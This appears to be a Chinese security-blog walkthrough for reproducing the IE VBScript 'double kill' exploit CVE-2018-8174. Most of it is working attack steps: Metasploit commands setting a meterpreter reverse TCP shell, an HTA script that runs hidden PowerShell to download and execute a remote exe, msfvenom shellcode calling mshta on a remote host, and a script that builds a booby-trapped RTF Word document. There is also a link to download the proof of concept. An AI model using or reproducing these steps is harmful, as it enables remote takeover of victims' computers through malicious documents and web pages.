最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。
POC验证
未打补丁系统,IE浏览器打开此地址会弹出计算器 。
data:image/s3,"s3://crabby-images/47a56/47a56612806987df7b39ffd045dfd18d84434909" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
metasploit 复现
下载 metasploit 模块到本地
git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
将CVE-2018-8174.rb复制到 fileformat 目录
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
将CVE-2018-8174.rtf复制到 exploits 目录
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
启动 metasploit
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit
data:image/s3,"s3://crabby-images/22dea/22dea4425adc6afe421ce9417027efa7a9bf8ee0" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开
或者IE浏览器打开 http://192.168.0.116:8080 即可获得会话
自定义下载者 复现
利用 mshta 从远程服务器下载文件执行。
请先下载poc附件,下文中使用 链接: https://pan.baidu.com/s/1eniGVNh6QWVxtlY4fVBDWQ 密码: 9ge5
1.构造HTA文件,当访问hta文件就会触发powershell下载文件至临时目录执行
准备你的xx.exe文件上传至站点目录,假如得到地址 http://xxx.com/xxx.exe
data:image/s3,"s3://crabby-images/c5bf4/c5bf4a2d56bf9ea1cd145f0b7e6ca0353ec20e28" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
HTA代码:
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>
把该文件命名 8174.hta 上传至站点目录;假如得到地址 http://test.radebit.com
/8174.hta
2.使用msfvenom生成 js Shellcode
msfvenom -p windows/exec cmd='mshta http://test.radebit.com
/8174.hta' -f js_le exitfunc=thread -a x86
data:image/s3,"s3://crabby-images/5579f/5579f23a7791d1444818c3e8a74fd4e2d67f0c04" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
把生成的Shellcode字符替换至 8174poc.html 166行代码
data:image/s3,"s3://crabby-images/b3102/b310286983c1ab0297703e7a57092268317cab99" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/2e5a1/2e5a19e0d8e8c4fd15e643c65b1cf8b2b3e84485" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
把 8174poc.html 文件上传至站点目录 假如得到地址 http://test.radebit.com
/8174poc.html
3.生成Word文档
* 下载python脚本保存本地
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
运行 CVE-2018-8174.py
python CVE-2018-8174.py -u http://test.radebit.com/8174poc.html -o exp.rtf
data:image/s3,"s3://crabby-images/92f4d/92f4dc3d099aa13c62c96047edaae75027de5efb" alt="CVE-2018-8174 0day漏洞复现-RadeBit瑞安全"
得到目录中的 “exp.rtf ”文件,使用Word文档打开即可下载执行xx.exe文件,或者IE浏览器打开 点击下载 即可下载执行xx.exe文件
样本演示运行效果 点击查看
最新评论